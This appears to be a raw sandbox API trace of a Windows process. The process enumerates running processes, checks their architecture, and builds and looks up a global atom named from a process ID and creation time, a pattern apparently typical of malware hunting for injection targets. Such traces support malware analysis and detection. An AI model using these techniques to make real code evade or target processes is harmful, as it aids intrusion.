	[0084.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x6a0
	[0084.859] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.859] CloseHandle (hObject=0x6a0) returned 1
	[0084.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397ea88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x6a0
	[0084.859] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.859] CloseHandle (hObject=0x6a0) returned 1
	[0084.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x6a0
	[0084.859] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.860] CloseHandle (hObject=0x6a0) returned 1
	[0084.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x396eb30, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0084.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e9f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x6a0
	[0084.860] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.860] CloseHandle (hObject=0x6a0) returned 1
	[0084.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x396e870, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x6a0
	[0084.860] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.860] CloseHandle (hObject=0x6a0) returned 1
	[0084.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x76c900, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x6a0
	[0084.861] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.861] CloseHandle (hObject=0x6a0) returned 1
	[0084.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x396e870, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0084.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x6a0
	[0084.861] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.861] CloseHandle (hObject=0x6a0) returned 1
	[0084.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39a1cb8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0084.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x6a0
	[0084.861] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.861] CloseHandle (hObject=0x6a0) returned 1
	[0084.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x396e7d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x6a0
	[0084.861] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.861] CloseHandle (hObject=0x6a0) returned 1
	[0084.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x397eab8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x6a0
	[0084.862] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.862] CloseHandle (hObject=0x6a0) returned 1
	[0084.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x6a0
	[0084.862] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.862] CloseHandle (hObject=0x6a0) returned 1
	[0084.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x396e870, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x6a0
	[0084.862] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.862] CloseHandle (hObject=0x6a0) returned 1
	[0084.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x396ea50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x6a0
	[0084.863] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.863] CloseHandle (hObject=0x6a0) returned 1
	[0084.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x6a0
	[0084.863] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.863] CloseHandle (hObject=0x6a0) returned 1
	[0084.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x397e8d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x6a0
	[0084.863] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.863] CloseHandle (hObject=0x6a0) returned 1
	[0084.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39a1bc8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0084.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x6a0
	[0084.864] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.864] CloseHandle (hObject=0x6a0) returned 1
	[0084.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x6a0
	[0084.864] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.864] CloseHandle (hObject=0x6a0) returned 1
	[0084.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x397e9b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x6a0
	[0084.864] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.864] CloseHandle (hObject=0x6a0) returned 1
	[0084.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x396e8b0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x6a0
	[0084.864] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.865] CloseHandle (hObject=0x6a0) returned 1
	[0084.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x6a0
	[0084.865] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.865] CloseHandle (hObject=0x6a0) returned 1
	[0084.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x396e870, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x6a0
	[0084.865] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.865] CloseHandle (hObject=0x6a0) returned 1
	[0084.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39a1bf0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0084.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x6a0
	[0084.865] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.865] CloseHandle (hObject=0x6a0) returned 1
	[0084.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39a19c0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0084.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x6a0
	[0084.866] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.866] CloseHandle (hObject=0x6a0) returned 1
	[0084.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x6a0
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.866] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.867] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0084.867] GetProcessTimes (in: hProcess=0x6a0, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0084.867] GetLastError () returned 0x5
	[0084.867] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.868] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.869] GetLastError () returned 0x5
	[0084.870] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.870] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0084.870] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.870] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0084.870] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0084.870] CloseHandle (hObject=0x6a0) returned 1
	[0084.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0084.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0084.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x6a0
	[0084.871] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.871] CloseHandle (hObject=0x6a0) returned 1
	[0084.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x397e9b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0084.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x6a0
	[0084.871] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.871] CloseHandle (hObject=0x6a0) returned 1
	[0084.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tmp8C77.tmp", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmp8C77.tmp", lpUsedDefaultChar=0x0) returned 11
	[0084.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x17078) returned 0xc0000004
	[0084.959] VirtualAlloc (lpAddress=0x0, dwSize=0x17178, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0084.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x17178, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0084.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0084.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x397eab8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0084.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0084.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0084.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0084.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0084.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0084.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0084.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0084.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
